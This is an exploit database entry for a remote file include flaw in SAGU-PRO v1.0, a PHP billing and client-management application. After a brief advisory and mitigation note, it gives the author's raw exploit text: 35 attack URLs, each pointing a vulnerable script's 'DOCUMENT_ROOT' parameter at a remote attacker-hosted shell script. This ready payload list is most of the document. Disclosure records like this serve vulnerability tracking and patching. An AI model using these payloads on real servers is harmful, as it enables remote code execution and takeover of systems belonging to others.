SAGU-PRO v1.0 Multiple Remote File Include Vulnerability

vendor:

SAGU-PRO

by:

mat

8,8

CVSS

HIGH

Remote File Include

CWE

Product Name: SAGU-PRO

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

SAGU-PRO v1.0 Multiple Remote File Include Vulnerability

SAGU-PRO v1.0 is vulnerable to multiple Remote File Include vulnerabilities. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'DOCUMENT_ROOT' parameter of multiple scripts. An attacker can exploit this vulnerability to execute arbitrary remote code on the vulnerable system.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to indirectly reference system resources. Additionally, the application should be configured to use a safe include_path.

Source

Exploit-DB raw data:

        \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
SAGU-PRO v1.0 Multiple Remote File Include Vulnerability
Script: http://gulbf.com.br/?q=node/145
Author: mat
Mail: rahmat_punk@hotmail.com
---------------Ooooo------------------------------------------------
               (   )
      ooooO     ) /
      (   )    (_/
       \ (
        \_)

//-----------------------------------------------------------------------------------------------------------+
http://[target]/[path]/cliente/ver_imagem.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/importar_pgtos.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/up_pgtos.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/ver_pgtos.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/boleto/boletounibanco.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/boleto/bb/boleto_bb.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/boleto/bradesco06/boleto_bradesco.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/boleto/cef/boleto_cef.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/boleto/hsbc/boleto_hsbc.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/boleto/itau/boleto_itau.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/boleto/real57/boleto_real.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/boleto/recibo/recibo.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/boleto/santader_banespa_102/boleto_santander_banespa.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/cc/up_fluxo.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/cc/importar_fluxos.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/cc/ver_fluxos.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/cc/post/altera_contacorrente.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/fpdf/clientes_ativos.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/fpdf/clientes_data_ativacao.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/fpdf/clientes_geral.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/fpdf/clientes_suspensos.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/fpdf/clientes_valores_cobranca.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/fpdf/clientes_vencto.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/fpdf/prev_outros_servicos.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/fpdf/prev_pacte_naveg.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/fpdf/resumo_log_pacote_conexao.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/graficos/graf_chamados_atendente.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/graficos/graf_evolucao_instalacoes_anual.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/graficos/graf_evolucao_instalacoes_mensal.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/graficos/graf_mensalidades_geradas_mensal.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/graficos/graf_visao_chamados.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/graficos/pre_graf_chamados_atendente.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/graficos/pre_graf_evolucao_instalacoes_mensal.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/graficos/pre_graf_mensalidades_geradas_mensal.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/graficos/pre_graf_visao_chamados.php?DOCUMENT_ROOT=http://[shellscript]
//-----------------------------------------------------------------------------------------------------------+

Greetings: All Hackerz